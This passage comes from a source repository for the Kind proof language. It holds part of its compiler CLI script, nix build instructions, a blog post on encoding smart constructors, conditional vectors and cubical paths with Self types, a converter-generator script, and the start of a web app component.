var fmcc = await kind.run(kind["Kind.api.io.term_to_core"](name));
try {
console.log(fmc_to_js.compile(fmcc, name, {module}));
} catch (e) {
throw "Couldn't find or compile term: '" + name + "'.";
}
} catch (e) {
display_error(name, e);
}
// JavaScript compilation
} else if (process.argv[3] === "--scm") {
var module = process.argv[4] === "--module";
try {
var scm = await kind.run(kind["Kind.api.io.term_to_scheme"](name));
console.log(scm);
} catch (e) {
display_error(name, e);
}
// JavaScript execution
} else if (process.argv[3] === "--run") {
try {
var fmcc = await kind.run(kind["Kind.api.io.term_to_core"](name));
try {
var asjs = fmc_to_js.compile(fmcc, name, {});
} catch (e) {
throw "Couldn't find or compile term: '" + name + "'.";
}
var js_path = ".kind.tmp.js";
try { fs.unlinkSync(js_path); } catch (e) {};
fs.writeFileSync(js_path, asjs);
require(path.join(process.cwd(),js_path));
fs.unlinkSync(js_path);
} catch (e) {
display_error(name, e);
}
// Scheme execution
} else if (process.argv[3] === "--run-scm") {
try {
var scm = await kind.run(kind["Kind.api.io.term_to_scheme"](name));
var scm_path = ".kind.tmp.scm";
try { fs.unlinkSync(scm_path); } catch (e) {};
fs.writeFileSync(scm_path, scm);
console.log(exec("scheme --script "+scm_path).toString().slice(0,-1));
fs.unlinkSync(scm_path);
} catch (e) {
display_error(name, e);
}
// Lambda evaluation
} else if (process.argv[3] === "--show") {
try {
await kind.run(kind["Kind.api.io.show_term"](name));
} catch (e) {
display_error(name, e);
}
// Lambda printing
} else if (process.argv[3] === "--norm") {
try {
await kind.run(kind["Kind.api.io.show_term_normal"](name));
} catch (e) {
display_error(name, e);
}
// Haskell compilation
//} else if (process.argv[3] === "--hs") {
//var module = process.argv[4] === "--module" ? process.argv[5]||"Main" : null;
//try {
//var fmcc = await kind.run(kind["Kind.api.io.term_to_core"](name));
//console.log(fmc_to_hs.compile(fmcc, name, {module}));
//} catch (e) {
//display_error(name, e);
//}
// Type-Checking
} else {
try {
if (name[name.length - 1] === "/") {
var files = await find_kind_files(path.join(process.cwd(), name));
await kind.run(kind["Kind.api.io.check_files"](array_to_list(files)));
} else if (name.slice(-5) !== ".kind") {
await kind.run(kind["Kind.api.io.check_term"](name));
} else if (name) {
await kind.run(kind["Kind.api.io.check_file"](ADD_PATH + name));
}
} catch (e) {
console.log("Sorry, KindJS couldn't handle your input. :( ");
console.log("Try Haskell/Scheme releases!")
console.log(e);
}
}
})();
<file_sep>/INSTALL.md
# Scheme
The Scheme backend handles recursion better than the default Javascript backend. That means it never stack overflows in deep recursions.
# Prebuilt binaries
Kind is distributed as a single binary executable. You can download it [here](https://github.com/uwu-tech/Kind/releases).
# Building from source
**1.** There are many dependencies involved to build the Scheme release and we use nix to manage them. So first you need to install the [latest version](https://github.com/numtide/nix-unstable-installer) of nix.
**2.** After installing nix enable the flakes feature by adding
```
experimental-features = nix-command flakes
```
to either `~/.config/nix/nix.conf` or `/etc/nix/nix.conf`. Restart your terminal for the change to take effect.
**3.** To build `kind-scm` navigate to the root of the repository and type
```
nix build .#kind-scm
```
Nix will build all the dependencies and place the executable inside the `result` folder. Subsequent builds will be much faster because the dependencies are already built.
If something doesn't work, [let us know](https://github.com/uwu-tech/Kind/issues) ;)
<file_sep>/blog/1-beyond-inductive-datatypes.md
Beyond inductive datatypes: exploring Self types
================================================
[Kind](https://github.com/uwu-tech/kind) is a **proof**gramming language that
can be used to define inductive datatypes and prove mathematical theorems by
induction, just like other proof assistants like Coq, Agda, Idris, Lean. Unlike
these, though, Kind doesn't include a complex native inductive datatype system.
Instead, it extends type-theory with a very simple primitive, `Self`, which
empowers the core language just enough to allow inductive datatypes to be
encoded with native lambdas. But can it go beyond? In this post, I present some
creative ways to `Self` to implement "super inductive" datatypes that are simply
impossible in conventional proof assistants.
A quick recap of Self-Types in Kind
-----------------------------------
> Self-types can be described briefly. The dependent function type, `∀ (x : A) -> B(x)`
> allows the type returned by a function call, `f(x)`, to depend on the value of the
> argument, `x`. The self-dependent function type, `∀ f(x : A) -> B(f,x)` allows the
> type returned by a function call, `f(x)`, to also depend on the value of the function,
> `f`. That is sufficient to encode all the inductive datatypes and proofs present in
> traditional proof languages, as well as many other things.
To get started, let's recap how Self-Types work in Kind. Let's start by defining
the `Nat` type, a simple recursive function, and an inductive proof:
```javascript
// A Natural Number is either zero, or the successor of another Natural Number
type Nat {
zero
succ(pred: Nat)
}
// A recursive function that removes all `succ` constructors
destroy(a: Nat): Nat
case a {
zero: Nat.zero
succ: destroy(a.pred)
}
// An inductive proof that destroying a natural number results in zero
destroy_theorem(a: Nat): destroy(a) == 0
case a {
zero: refl
succ: destroy_theorem(a.pred)
}!
```
This should be familiar to a reader used to traditional proof assistants. For
comparison, here is the same program in Agda:
```agda
data Nat : Set where
zero : Nat
succ : (pred : Nat) -> Nat
destroy : Nat -> Nat
destroy zero = zero
destroy (succ pred) = destroy pred
destroy-theorem : (a : Nat) -> destroy(a) == 0
destroy-theorem zero = refl
destroy-theorem (succ pred) = destroy-theorem pred
```
The algorithms are the same. Under the hoods, though, things are very different.
When you declare a datatype in Agda, it will add the constructors `zero` and
`succ` to the global scope. These constructors are atomic, they can't be broken
down into smaller pieces.
In `Kind`, something different happens: the `type` syntax is translated to
top-level definitions that represent the datatype using raw lambdas. Then, the
`case` expressions are translated to raw function applications. After this
"desugaring" process, the program above becomes:
```javascript
// Natural numbers
Nat: Type
self(P: Nat -> Type) ->
(zero: P(Nat.zero)) ->
(succ: (pred: Nat) -> P(Nat.succ(pred))) ->
P(self)
// The zero constructor of Nat
Nat.zero: Nat
(P, zero, succ) zero // same as: "λP. λzero. λsucc. zero"
// The succ constructor of Nat
Nat.succ(pred: Nat): Nat
(P, zero, succ) succ(pred) // same as: "λP. λzero. λsucc. (succ pred)"
// A recursive function that removes all `succ` constructors
destroy(a: Nat): Nat
a((a) Nat)(Nat.zero, (a.pred) destroy(a.pred))
// An inductive proof that destroying a natural number results in zero
destroy_theorem(a: Nat): destroy(a) == Nat.zero
a((a) destroy(a) == Nat.zero, refl, (a.pred) destroy_theorem(a.pred))
// Syntax notes:
// - "self(x: A) -> B" is a self-forall (self-dependent function type)
// - "(f, x) f(f(x))" is a lambda (as in, "λf. λx. (f (f x))")
// - "." is just a name-valid character (so "foo.bar" is just a name)
```
In other words, after parsing, the first program is exactly equivalent to this
one. If you wanted to, you could completely ignore the `type` / `case` syntaxes
and just encode your datatypes / pattern-matches with lambdas / applications
directly. Doing so will make your programs more verbose, but will grant you
the power to do things that were otherwise impossible. Let's explore some of
these possibilities now!
Possibility #0: smart constructors
----------------------------------
To motivate this example, let's port [Agda's `Int` type](https://github.com/agda/agda/blob/master/src/data/lib/prim/Agda/Builtin/Int.agda) to Kind:
```javascript
// Int.pos(n) represents +n
// Int.neg(n) represents -(n + 1)
type Int {
pos(n: Nat)
neg(n: Nat)
}
```
The idea is that an `Int` is either a positive `Nat` or a negative `Nat`. In
order to avoid having two zeros, the `neg` constructor starts as `-1`.
This works, but it results in complex, confusing arithmetic functions, as we
have to cautiously consider many cases of signs. For example, here is `negate`
and `add`, ported from `Agda`:
```javascript
Int.negate(a: Int): Int
case a {
pos: case a.nat {
zero: Int.pos(Nat.zero)
succ: Int.neg(a.nat.pred)
}
neg: Int.pos(Nat.succ(a.nat))
}
Int.add(a: Int, b: Int): Int
case a b {
pos pos: Int.pos(Nat.add(a.nat, b.nat))
neg neg: Int.neg(Nat.succ(Nat.add(a.nat, b.nat)))
pos neg: if b.nat <? a.nat
then Int.pos((a.nat - b.nat) - 1)
else Int.neg(b.nat - a.nat)
neg pos: Int.add(Int.pos(b.nat), Int.neg(a.nat))
}
```
Disgusting, right? The odds I've inverted some sign or off-by-one error when
porting this code are great, and I don't want to prove it either.
An alternative would be to represent an `Int` as a pair of two `Nat`s, and the
integer is represented by the first natural number subtracting the second
natural number.
```javascript
// Int.val(a, b) represents `a - b`
type Int {
new(pos: Nat, neg: Nat)
}
```
In this representation, algorithms become very simple. For example, we could
negate an `Int` by just swapping its components, and we could add two `Int`s by
adding each component:
```javascript
Int.neg(a: Int): Int
case a {
new: Int.new(a.neg, a.pos)
}
Int.add(a: Int, b: Int): Int
case a b {
new new: Int.new(Nat.add(a.pos, b.pos), Nat.add(a.neg, b.neg))
}
```
This is beautiful. But while this type is great for algorithms, it
breaks theorem proving. That's because there are multiple representations of the
same integer. For example, `3` can be written as `Int.new(3, 0)`, `Int.new(4,
1)`, `Int.new(5, 2)` and so on. This is bad. We could solve this issue by adding
an extra field enforcing that either `pos` or `neg` is `zero`:
```javascript
// Int.val(a, b) represents `a - b`
type Int {
new(pos: Nat, neg: Nat, eq: Either(Equal(Nat,pos,0), Equal(Nat,neg,0))
}
```
This would be technically correct, but algorithms would become considerably
worse, as we'd need to prove that `eq` still holds every time we construct and
`Int`. This is terrible. What if we could, instead, have an `Int.new`
constructor that automatically "canonicalized itself", such that
`Int.new(5, 2)` **reduced to** `Int.new(3, 0)`, making both equal
**by definition**?
A friend of mine, <NAME>, has some unpublished work, where he uses this
idea, which he calls "inductive types with conditions", to encode higher
inductive types (HITs) and the cubical path type. I'm a simpler person, so I just
call this "smart constructors". The concept is implemented in the Arend language
with a nice syntax, and the idea was invented individually by me and the
language authors.
Kind doesn't have a nice syntax for smart constructors yet. But the surprising
fact is we can still encode them by "hacking" the Self encodings generated by
the parser! Let's start by asking Kind to display the self-encoding of `Int`
with `Kind Int --show`:
```javascript
Int: Type
self(P: Int -> Type) ->
(new: (pos:Nat) -> (neg:Nat) -> P(Int.new(pos,neg))) ->
P(self)
Int.new(pos: Nat, neg: Nat): Int
(P, new) new(pos, neg)
```
As you can see, the `Int.new` constructor isn't an atomic value, but instead, it
is just a regular definition. Does that mean we can add computations inside that
definition? Sure! And that is exactly what we are going to do:
```javascript
Int.new(pos: Nat, neg: Nat): Int
(P, new)
case pos {
zero: new(Nat.zero, neg) // halts
succ: case neg {
zero: new(Nat.succ(pos.pred), Nat.zero) // halts
succ: Int.new(pos.pred, neg.pred)(P, new) // recurses
}!
}: P(Int.new(pos, neg))
```
This new "smart constructor" does exactly what it should, decreasing both values
recursively until one of them is zero. It is as if we wrote this hypothetical
syntax:
```javascript
type Int {
new(pos: Nat, neg: Nat) with {
zero zero: new(zero, zero) // halts
zero succ: new(zero, succ(neg.pred)) // halts
succ zero: new(succ(pos.pred), zero) // halts
succ succ: Int.new(pos.pred, neg.pred) // recurses
}
}
```
And, yes: it just works! Different ways to represent the same number become
equal by definition. So, for example, we can prove that `Int.new(5, 2) ==
Int.new(3, 0)` with just `refl`:
```javascript
same: Int.new(5, 2) == Int.new(3, 0)
refl
```
And the algorithms become as clean as you'd expect. Check them on the
[Kind/base/Int](https://github.com/uwu-tech/Kind/tree/master/base/Int)
directory!
This idea, I believe, can be generalized to represent quotient types; see Aaron
Stump's [Quotients by Idempotent Functions in
Cedille](https://homepage.cs.uiowa.edu/~cwjnkins/assets/MJS19_Quotients-Idempotent-Functions-Cedille.pdf).
Possibility #1: conditional constructors
----------------------------------------
*Edit: after thinking about it, this isn't different from just functions that
return types, which conventional proof languages can do just fine. But I'll
leave it here because it is still useful information. Go ahead to the next
section if you just want to explore self types.*
In [this paper](https://arxiv.org/pdf/2103.15408.pdf), <NAME> (again!)
proposes a different encoding of indexed datatypes. He starts by presenting the
usual definition of `Vector` in Agda:
```agda
data Vector (A : Type) : (len : Nat) -> Type where
vnil : Vector A zero
vcons : (len : Nat) -> (head : A) -> (tail : Vector A len) -> Vect A (succ len)
```
And then proposes, instead, a definition that, adapted, looks like this:
```agda
data Vector (A : Type) (len : Nat) : Type
| A zero => vnil
| A (succ pred) => vcons (head : A) (tail : Vect A pred)
```
What this is saying is that the very shape of a Vector depends on the value
of `len` (its length). A Vector with length `0` has only one constructor:
`vnil`. A Vector with length `succ(n)` has also only one constructor: `vcons`,
with a `head` and a `tail`. Tesla argues this is an easier way to implement
indexed datatypes since it doesn't require dealing with indices. For Kind, that
isn't relevant, as we already have inductive datatypes from `Self` (which, I
argue, is even easier to implement). But this encoding has another benefit:
pattern-matching only demands the required cases. If you pattern-match a vector
with `len > 0`, you don't need to provide the `nil` case at all, which is very
convenient as you don't need to prove it is unreachable. Of course, if the `len`
is unknown, then you won't be able to pattern-match it at all until you
pattern-match on the `len` itself.
How can we do it with `Self` types? Let's start defining the conventional
indexed `Vector` datatype, using the built-in syntax.
```javascript
type Vector (A: Type) ~ (len: Nat) {
nil ~ (len = Nat.zero)
cons(len: Nat, head: A, tail: Vector(A,len)) ~ (len = Nat.succ(len))
}
```
This has the same information as Agda's definition, although with a slightly
different syntax. We can ask Kind to display its self-encoding by typing `kind
Vector --show` on the terminal. The result, adapted for readability, is:
```javascript
Vector(A: Type, len: Nat): Type
self(P: Nat -> Vector(A,len) -> Type) ->
(nil: P(0, nil(A))) ->
(cons: (len: Nat) -> (head: A) -> (tail: Vector(A,len)) -> P(Nat.succ(len), cons(A,len,head,tail))) ->
P(len, self)
nil(A: Type): Vector(A, Nat.zero)
(P, nil, cons) nil
cons(A: Type, len: Nat, head: A, tail: Vector(A, len)): Vector(A, Nat.succ(len))
(P, nil, cons) cons(len,head,tail)
```
This isn't very easy on the eye, but you don't need to understand how this
translation works. The only thing that matters is that `Vector` is, again, just
a regular definition, so we can "hack" it too by adding a computation inside:
```javascript
Vector(A: Type, len: Nat): Type
case len {
zero:
self(P: (self: Vector(A,0)) Type) ->
(nil: P(nil(A))) ->
P(self)
succ:
self(P: (self: Vector(A,Nat.succ(len.pred))) Type) ->
(cons: (head: A) -> (tail: Vector(A, len.pred)) -> P(cons(A,len.pred,head,tail))) ->
P(self)
}
nil(A: Type): Vector(A, 0)
(self, nil) nil
cons(A: Type, len: Nat, head: A, tail: Vector(A, len)): Vector(A, Nat.succ(len))
(self, cons) cons(head, tail)
```
Here, we pattern-match on `len` inside of the `Vector` definition, in order to
return two different types. When `len` zero, `Vector` becomes a datatype only
the `nil` constructor. When `len` is `succ(n)`, it becomes a datatype with only
the `cons` constructor. It is as if we wrote this hypothetical syntax:
```javascript
type Vector(A: Type, len: Nat) {
case len {
zero: nil
succ: cons(head: A, tail: Vector(A, len.pred))
}
}
```
Is that enough to implement Tesla's datatypes? Yes, and it behaves exactly as
expected! We can construct Vectors using `cons`:
```javascript
my_vec: Vector(Nat, 3)
cons!!(100, cons!!(200, cons!!(300, nil!)))
```
And we can destruct using the `case` syntax, which will work since the
desugaring is the same:
```javascript
head(A: Type, len: Nat, vec: Vector(A, Nat.succ(len))): A
case vec {
cons: vec.head
}
```
The `head` function magically type-checks with only the `cons` case, because
Kind knows that the `size` is not `0`. If the size of the vector was unknown:
```javascript
head(A: Type, len: Nat, vec: Vector(A, len)): Maybe(A)
case vec {
nil: ?a
cons: ?b
}: A
```
Kind would complain that it can't infer the type of `case`. We can't
pattern-match on `vec` on the body of `head` at all. But we can if we
pattern-match on `len` first and then specialize the type of `vec` with `with`:
```javascript
head(A: Type, len: Nat, vec: Vector(A, len)): Maybe(A)
case len with vec {
zero: case vec {
nil: none
}
succ: case vec {
cons: some(vec.head)
}
}!
```
Kind graciously demands only the `nil` case on the `zero` branch and only the
`cons` case on the `succ` branch!
To be honest, I'm surprised it works so well, given that I wasn't even
aware of this encoding when I implemented the language. In a future, I may
update Kind to incorporate Tesla's syntax for this kind of datatype, but the
fact you can already do that by manually tweaking the Self-encodings is
beautiful.
Possibility #2: first-class modules
-----------------------------------
Check [this post](https://github.com/uwu-tech/Kind/blob/master/blog/2-first-class-modules-with-self-types.md)
for a simple encoding of first-class modules with self types.
Possibility #3: higher inductive types
--------------------------------------
From ncatlab, *"Higher inductive types (HITs) are a generalization of inductive
types which allow the constructors to produce, not just points of the type being
defined, but also elements of its iterated identity types."* In simpler words,
it is as if a datatype could have constructors with types that aren't
necessarily the same as the type being defined, but, instead, equalities. For
example, we could define a type for "unordered pairs" as:
```agda
data UnordPair (A : Set) : Set where
make : (a : A) -> (b : A) -> UnordPair A
swap : make a b == make b a
```
This pair type has an extra constructor, `swap`, that enforces that `(a,b) ==
(b,a)`. Because of that, whenever we pattern-match on `UnordPair`, we must prove
that the result will not depend on the order of the arguments. As such, it is
impossible to, for example, write the function "first" for it; after all, there
is no such a thing as the first element of an unordered pair. But it is possible
to write the function "sum", because `a + b == b + a`, so the order doesn't
matter when adding both values.
Can we encode `UnordPair` with Self? Well yes, but actually no. Let's start by
encoding it without the `swap` constructor:
```javascript
UPair(A: Type): Type
self(P: UPair(A) -> Type) ->
(make: (a: A) -> (b: A) -> P(UPair.make(A, a,b))) ->
P(self)
UPair.make(A: Type, a: A, b: A): UPair(A)
(P, make) make(a, b)
```
This is just a regular pair. Now, let's try to hack it again and add the swap
constructor:
```javascript
UPair(A: Type): Type
self(P: UPair(A) -> Type) ->
(make: (a: A) -> (b: A) -> P(UPair.make(A, a,b))) ->
(swap: (a: A) -> (b: A) -> Equal(_, make(a,b), make(b,a))) ->
P(self)
UPair.make(A: Type, a: A, b: A): UPair(A)
(P, make, swap) make(a, b)
```
As you can see, all we did is add a new constructor, `swap`, that returns an
`Equal(...)` instead of a `P(...)`. That constructor is supposed to, whenever we
pattern-match an `UPair`, demand a proof that the value returned by the `make`
branch doesn't depend on the order of `a` and `b`. Does that work? No! That's
because Kind doesn't have heterogeneous equality, and `make(a,b)` and
`make(b,a)` have different types (`P(UPair.make(A, a,b))` and
`P(UPair.make(A, b,a))`). We can make it work, though, if we create a
non-inductive version of UPair:
```javascript
UPair(A: Type): Type
self(P: Type) ->
(make: (a: A) -> (b: A) -> P) ->
(swap: (a: A) -> (b: A) -> Equal(P, make(a,b), make(b,a))) ->
P
UPair.make(A: Type, a: A, b: A): UPair(A)
(P, make, swap) make(a, b)
```
This definition allows us to create unordered pairs, and we can pattern-match on
them, as long as the result doesn't depend on the order of the elements. For
example, we can return a constant:
```javascript
Test: Nat
let upair = UPair.make!(1, 2)
case upair {
make: 4
swap: refl
}
```
And we can add both elements:
```javascript
Test: Nat
let upair = UPair.make!(1, 2)
case upair {
make: upair.a + upair.b
swap: Nat.add.comm(upair.a, upair.b)
}
```
But we can't get the first element:
```javascript
Test: Nat
let upair = UPair.make!(1, 2)
case upair {
make: upair.a
swap: ?a
}
```
As that would demand a proof that `1 == 2`.
While this kinda works, we can't prove the induction principle for `UPair`'s,
because we had to make the Self-encoding non-inductive due to the lack of
heterogeneous equality. Moreover, even if we could, we'd still not be able to
prove that `UPair.make!(a,b) == UPair.make!(b,a)` because the language lacks
`funext`. If we did have both heterogeneous equality and funext, though, then
we'd be able to encode higher inductive types as done in cubical languages. It
is an open problem to have these without huge structural changes on Kind's core
language. If you have any clue on how that could be done, please let me know!
Possibility #3: intervals and paths
-----------------------------------
The main insight is that we can encode the Interval type and the Path type as
Self-encodings that refer to each other. The Interval type is like a boolean,
but with an extra constructor of type `i0 == i1` forcing that, in order to
eliminate an interval, both cases must be equal. The Path type proposes that
two values `a, b : A` are equal if there exists a function `t : I -> A` such
that `t(i0) = a` and `t(i1) = b`. In other words, it is the equivalent of:
```agda
data I : Set where
i0 : I
i1 : I
ie : Path A i0 i1
data Path (A: I -> Set) : (A i0) -> (A i1) -> Set where
abs : (t : (i: I) -> A i) -> Path A (t i0) (t i1)
```
Here is it:
```javascript
// The Interval type:
// Γ ⊢
// ------------
// Γ ⊢ I : Type
I: Type
i(P: I -> Type) ->
(i0: P(i0)) ->
(i1: P(i1)) ->
(ie: Path(P, i0, i1)) ->
P(i)
// The i0 interval:
// Γ ⊢
// ----------
// Γ ⊢ i0 : I
i0: I
(P, i0, i1, ie) i0
// The i1 interval:
// Γ ⊢
// ----------
// Γ ⊢ i1 : I
i1: I
(P, i0, i1, ie) i1
// Interval equality:
// Γ ⊢
// -----------------
// Γ ⊢ ie : i0 == i1
ie: Path((i) I, i0, i1)
(P, abs) abs((i) i)
// The Path type:
// Γ, i : Type ⊢ A(i) : Type
// Γ ⊢ a : A(i)
// Γ ⊢ b : A(i)
// -------------------------------
// Γ ⊢ Path(A, a, b) : Type
Path(A: I -> Type, a: A(i0), b: A(i1)) : Type
path(P: (a: A(i0)) -> (b: A(i1)) -> Path(A, a, b) -> Type) ->
(abs: (t: (i:I) -> A(i)) -> P(t(i0), t(i1), Path.abs(A, t))) ->
P(a, b, path)
// Path abstraction:
// Γ ⊢ A Γ, i : I ⊢ t : A
// ---------------------------------
// Γ ⊢ (i) t : Path(A, t(i0), t(i1))
Path.abs (A: I -> Type) (t: (i:I) -> A(i)): Path(A, t(i0), t(i1))
(P, abs) abs(t)
// Path application:
// Γ ⊢ e : Path(A, a, b)
// Γ ⊢ i : I
// ---------------------
// Γ ⊢ e(i) : A
app(A: I -> Type, a: A(i0), b: A(i1), e: Path(A, a, b), i: I): A(i)
i(A, a, b, e)
// Path left:
// Γ ⊢ a : A
// Γ ⊢ b : B
// Γ ⊢ e : Path A a b
// --------------------------
// Γ ⊢ p0(a,b,e) : e(i0) == a
p0(A: Type, a: A, b: A, P: A -> Type, e: Path((i) A,a,b), p: P(app((i) A,a,b,e,i0))): P(a)
e((x, y, e) P(app((i) A,x,y,e,i0)) -> P(x), (t) (p) p, p)
// Path right:
// Γ ⊢ A : Type
// Γ ⊢ a : A
// Γ ⊢ b : B
// Γ ⊢ e : Path A a b
// --------------------------
// Γ ⊢ p1(a,b,e) : e(i1) == b
p1(A: Type, a: A, b: A, P: A -> Type, e: Path((i) A,a,b), p: P(app((i) A,a,b,e,i1))): P(b)
e((x, y, e) P(app((i) A,x,y,e,i1)) -> P(y), (t) (k) k, p)
// Path reflexivity:
// refl : ∀ {ℓ} {A : Set ℓ} {x : A} → Path A x x
// refl {x = x} = λ i → x
refl(A: Type, x: A): Path((i) A, x, x)
(P, abs) abs((i) x)
// Path congruence:
// cong : ∀ {ℓ} {A : Set ℓ} {x y : A} {B : A → Set ℓ} (f : (a : A) → B a) (p : x ≡ y) → PathP (λ i → B (p i)) (f x) (f y)
// cong f p i = f (p i)
cong
(A: Type) ->
(B: A -> Type) ->
(x: A) ->
(y: A) ->
(f: (a: A) -> B(a)) ->
(p: Path((i) A, x, y)) ->
: Path((i) B(app((i) A, x, y, p, i)), f(x), f(y))
(P, abs) abs((i) f(app((i) A, x, y, p, i)))
// Path symmetry: (TODO: depends on `neg`)
// sym : ∀ {ℓ} {A : Set ℓ} {x y : A} → x ≡ y → y ≡ x
// sym p = λ i → p (~ i)
// Examples
type Bool {
true
false
}
// We can prove that `true = true` by using a constant
tt0: Path((i) Bool, Bool.true, Bool.true)
Path.abs((i) Bool, (i) Bool.true)
// We can prove that `true = true` by pattern-matching
tt1: Path((i) Bool, Bool.true, Bool.true)
Path.abs((i) Bool, (i)
case i {
i0: Bool.true
i1: Bool.true
ie: refl<Bool>(Bool.true)
}
// We can't prove that `true = false`!
// The fact that the images of two equal elements are equal:
// Γ ⊢ a : A
// Γ ⊢ b : A
// Γ ⊢ f : A → B
// Γ ⊢ p : Path A a b
// -------------------------------------
// Γ ⊢ Path.abs((i) f (p i)) : Path B (f a) (f b)
img(A: Type, B: Type, a: A, b: A, f: A -> B, p: Path((i) A, a, b)): Path((i) B, f(a), f(b))
Path.abs((i) B, (i) f(app((i) A,a,b,p,i)))
// Function extensionality:
// Note that this is eta-expanded as `(x) f(x) = (x) g(x)` because Formality
// doesn't eta-reduce for performance and code-simplicity reasons, but this
// could easily be added to the language to have `f = g`.
funext
(A: Type) ->
(B: A -> Type) ->
(f: (x: A) -> B(x)) ->
(g: (x: A) -> B(x)) ->
(h: (x: A) -> Path((i) B(x), f(x), g(x))) ->
: Path((i) (x: A) -> B(x), (x) f(x), (x) g(x))
Path.abs((i) (x:A) -> B(x))((i) (x) app((i) B(x), f(x), g(x), h(x), i))
```
Sadly, while we can prove `funext` for this type, we can't prove `transp`, even
though it is true. Finding a simple way to extend Kind's core language to allow
`transp` to be proved internally is another open problem.
<file_sep>/base/Kind/Name/generate_conversors.js
var table = {
'A': '000000', 'B': '100000', 'C': '010000', 'D': '110000',
'E': '001000', 'F': '101000', 'G': '011000', 'H': '111000',
'I': '000100', 'J': '100100', 'K': '010100', 'L': '110100',
'M': '001100', 'N': '101100', 'O': '011100', 'P': '111100',
'Q': '000010', 'R': '100010', 'S': '010010', 'T': '110010',
'U': '001010', 'V': '101010', 'W': '011010', 'X': '111010',
'Y': '000110', 'Z': '100110', 'a': '010110', 'b': '110110',
'c': '001110', 'd': '101110', 'e': '011110', 'f': '111110',
'g': '000001', 'h': '100001', 'i': '010001', 'j': '110001',
'k': '001001', 'l': '101001', 'm': '011001', 'n': '111001',
'o': '000101', 'p': '100101', 'q': '010101', 'r': '110101',
's': '001101', 't': '101101', 'u': '011101', 'v': '111101',
'w': '000011', 'x': '100011', 'y': '010011', 'z': '110011',
'0': '001011', '1': '101011', '2': '011011', '3': '111011',
'4': '000111', '5': '100111', '6': '010111', '7': '110111',
'8': '001111', '9': '101111', '.': '011111', '_': '111111',
};
for (var key in table) {
table[table[key]] = key;
}
function sp(tab) {
return tab === 0 ? "" : " " + sp(tab - 1);
}
function go(bs, tab=0, depth=0, prev="") {
var name = "bs";
if (depth === 6) {
let chr = table[bs.split("").reverse().join("")];
console.log(sp(tab) + prev + "String.cons('"+chr+"',Kind.Name.from_bits(bs))");
} else {
console.log(sp(tab) + prev + "case " + name + " {");
console.log(sp(tab+2) + "E: String.nil");
go(bs+"0", tab+2, depth+1, "O: let bs = bs.pred; ");
go(bs+"1", tab+2, depth+1, "I: let bs = bs.pred; ");
console.log(sp(tab) + "}");
}
};
function og(bs, i, j, tab=0, prev="") {
if (j - i <= 1) {
//var text = "E";
//for (var i = bs.length - 1; i >= 0; --i) {
//text = bs[i] === "0" ? "O("+text+")" : "I("+text+")";
//}
var chr = String.fromCharCode(i);
var bts = table[chr].split("").reverse().join("");
var txt = "Kind.Name.to_bits(name.tail)";
for (var i = bts.length - 1; i >= 0; --i) {
txt = bts[i] === "0" ? "O("+txt+")" : "I("+txt+")";
}
console.log(sp(Math.max(tab-2,0)) + prev + txt);
} else {
console.log(sp(Math.max(tab-2,0)) + prev + "if U16.ltn(x,"+Math.floor((j+i)/2)+"#16)");
og(bs+"0", i, Math.floor((j+i)/2), tab+2, "then ");
og(bs+"1", Math.floor((j+i)/2), j, tab+2, "else ");
}
};
//. : 46
//0-9 : 48-57
//A-Z : 65-90
//_ : 95
//a-z : 97-122
console.log(" if U16.ltn(x,47#16) then");
og("", 46, 47, 6);
console.log(" else if U16.ltn(x,58#16) then");
og("", 48, 58, 6);
console.log(" else if U16.ltn(x,91#16) then");
og("", 65, 91, 6);
console.log(" else if U16.ltn(x,96#16) then");
og("", 95, 96, 6);
console.log(" else");
og("", 97, 123, 6);
<file_sep>/base/User/maisa/bytes.md
# Bytes
Reference: https://docs.ethers.io/v5/api/utils/bytes/#Bytes
- A Bytes is any object which is an Array or TypedArray with each value in the valid byte range (i.e. between 0 and 255 inclusive), or is an Object with a length property where each indexed property is in the valid byte range.
#### Obs:
- All JavaScript numbers are 64-bit floating-point numbers
<file_sep>/web/src/AppPlay.js
const { Component, render } = require("inferno");
const h = require("inferno-hyperscript").h;
const apps = require("./apps/index.js");
const ethsig = require("nano-ethereum-signer");
const utils = require("./utils.js");
const StateList = require("./StateList.js");
const DEBUG_SHOW_FPS = false;
module.exports = class AppPlay extends Component {
// Sets up internal variables
constructor(props) {
super(props);
this.name = props.name; // name of this application
this.app = null; // application module, compiled from Kind
this.app_state = null; // the state of the application
this.app_global_states = null; // previous global states
this.app_global_tick = null; // global tick we're at
this.app_global_begin = null; // the first tick of this app
this.app_global_posts = {}; // map of global posts
this.app_has_ticker = false; // is there a tick function?
this.received_posts = []; // list of posts in received order
this.display = null; // message to display (overrides render)
this.watching = {}; // rooms I'm watching
this.intervals = {}; // timed intervals
this.listeners = {}; // event listeners
this.mouse_pos = { _: "Pair.new", fst: 0, snd: 0 };
this.rendered = null; // document rendered by app, coming from Kind
this.container = props.container; // container that holds rendered app
this.canvas = {}; // multiple canvas that holds rendered pixel-art apps
}
// Initializes everything
async componentDidMount() {
await this.init_app();
await this.init_input_events();
await this.init_renderer();
}
// Clear up intervals and event listeners
async componentWillUnmount() {
for (var key in this.intervals) {
clearInterval(this.intervals[key]);
}
for (var key in this.listeners) {
document.body.removeEventListener(key, this.listeners[key]);
};
}
// Loads the application from Moonad, which was pre-compiled to JavaScript
async init_app() {
if (!this.app && apps[this.name]) {
//console.log("loading app...");
this.app = (await apps[this.name])[this.name];
this.app_has_ticker = this.app.tick.toString() !== "x0 => x1 => App$no_tick$(x0, x1)"; // lil hacker's optimization
this.app_state = {
_: "App.Store.new",
local: this.app.init.local,
global: this.app.init.global
};
}
}
// Initializes the input event listeners
async init_input_events() {
//this.events = []; // this application's events
//function print_time() {
//console.clear();
//console.log("local_time : ", Date.now());
//console.log("server_time : ", window.KindEvents.get_time());
//console.log("delta_time : ", Date.now() - window.KindEvents.get_time());
//console.log("");
//}
//setInterval(print_time, 200);
// Init event
this.register_event({
_: "App.Event.init",
time: BigInt(0),
user: ethsig.addressFromKey("0x"+KEY).slice(2),
info: {
_: "App.EnvInfo.new",
screen_size: {
_: "Pair.new",
fst: this.container ? this.container.width : 0,
snd: this.container ? this.container.height : 0,
},
mouse_pos: this.mouse_pos,
}
});
// Mouse movement event
this.listeners.mousemove = (e) => {
this.mouse_pos = {_: "Pair.new", fst: e.pageX, snd: e.pageY};
this.register_event({
_: "App.Event.mouse_move",
time: BigInt(Date.now()),
id: e.target.id,
mouse_pos: {_: "Pair.new", fst: e.offsetX, snd: e.offsetY}
});
}
document.body.addEventListener("mousemove", this.listeners.mousemove);
// Mouse down event
this.listeners.mousedown = (e) => {
this.register_event({
_: "App.Event.mouse_down",
time: BigInt(Date.now()),
});
};
